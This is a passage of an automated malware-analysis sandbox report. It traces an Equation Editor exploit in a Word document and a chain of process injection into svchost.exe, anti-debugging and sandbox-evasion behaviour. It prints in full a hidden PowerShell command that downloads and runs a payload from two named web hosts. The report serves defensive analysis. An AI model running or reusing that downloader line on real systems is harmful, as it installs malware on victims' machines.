Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000A.00000002.10103033130.04DF0000.00000002.sdmp
Source: Binary string: C:\Users\jawa\Desktop\Response.pdb; source: powershell.exe, 0000000A.00000002.10095450491.01D62000.00000004.sdmp
Source: Binary string: C:\Users\jawa\Desktop\Response.pdb source: powershell.exe, 0000000A.00000002.10095450491.01D62000.00000004.sdmp, ounehcnaykuL.exe.10.dr
Source: Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdbHS source: ounehcnaykuM.exe, 00000015.00000002.10780399034.01CDA000.00000004.sdmp, svchost.exe, 00000017.00000000.10695933341.10001000.00000004.sdmp
Source: Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdb source: ounehcnaykuM.exe, 00000015.00000002.10780399034.01CDA000.00000004.sdmp, svchost.exe, 00000017.00000000.10695933341.10001000.00000004.sdmp
Document has a 'vbamacros' value indicative for goodwareShow sources
Source: VBA869.tmp.14.drInitial sample: OLE indicators vbamacros = False

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 60000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: B0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10001000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10010000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10014000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 10017000 protect: page read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 130000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 130000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeMemory written: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10000000 value starts with: 4D5AJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeThread register set: target process: 2780Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeThread register set: target process: 2992Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeThread register set: target process: 3060Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 60000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: B0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: EE2104Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10000000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10001000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10001000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10014000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10014000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10017000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10017000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 130000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: B0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 130000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: B0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010018Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 1001001CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010020Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010024Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010028Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 1001002CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010030Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010034Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010038Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 1001003CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010040Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010044Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010048Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 1001004CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010050Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010054Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010058Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 1001005CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 10010060Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU cJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''Jump to behavior
Contains functionality to create a new security descriptorShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E6E00 VariantClear,VariantInit,GetCurrentProcess,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,CloseHandle,18_2_001E6E00
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: svchost.exe, 00000017.00000002.10782508684.00EF0000.00000002.sdmpBinary or memory string: Progman
Source: svchost.exe, 00000017.00000002.10782508684.00EF0000.00000002.sdmpBinary or memory string: Program Manager
Source: svchost.exe, 00000017.00000002.10782508684.00EF0000.00000002.sdmpBinary or memory string: Shell_TrayWnd

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXESystem information queried: KernelDebuggerInformationJump to behavior
Checks if the current process is being debuggedShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001F2F40 rdtsc 18_2_001F2F40
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,18_2_00415D50
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001F1F60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,RtlReAllocateHeap,RtlAllocateHeap,18_2_001F1F60
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E9640 SetUnhandledExceptionFilter,18_2_001E9640
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E2C63 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_001E2C63
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_00179640 SetUnhandledExceptionFilter,21_2_00179640
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_00172C63 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00172C63
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001F2F40 rdtsc 18_2_001F2F40
Contains functionality to query network adapater informationShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: GetAdaptersInfo,GetAdaptersInfo,18_2_001F0E90
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: GetAdaptersInfo,GetAdaptersInfo,GetAdaptersInfo,21_2_00180E90
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeWindow / User API: threadDelayed 36115Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeWindow / User API: threadDelayed 463886Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeWindow / User API: threadDelayed 36877Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeWindow / User API: threadDelayed 463124Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeWindow / User API: threadDelayed 1000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeWindow / User API: threadDelayed 492163Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeWindow / User API: threadDelayed 7838Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeWindow / User API: threadDelayed 998Jump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972Thread sleep count: 50 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032Thread sleep time: -922337203685477s >= -60000sJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2776Thread sleep count: 36877 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2776Thread sleep count: 463124 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2984Thread sleep count: 1000 > 30Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2672Thread sleep time: -120000s >= -60000sJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2528Thread sleep count: 492163 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2528Thread sleep count: 7838 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 3080Thread sleep count: 998 > 30Jump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E2530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,18_2_001E2530
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_00172530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,21_2_00172530
Contains functionality to query system informationShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E4A60 GetVersionExW,GetModuleHandleW,GetProcAddress,GetSystemInfo,18_2_001E4A60
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 87.247.241.143 80Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EEDA0 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,18_2_001EEDA0
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
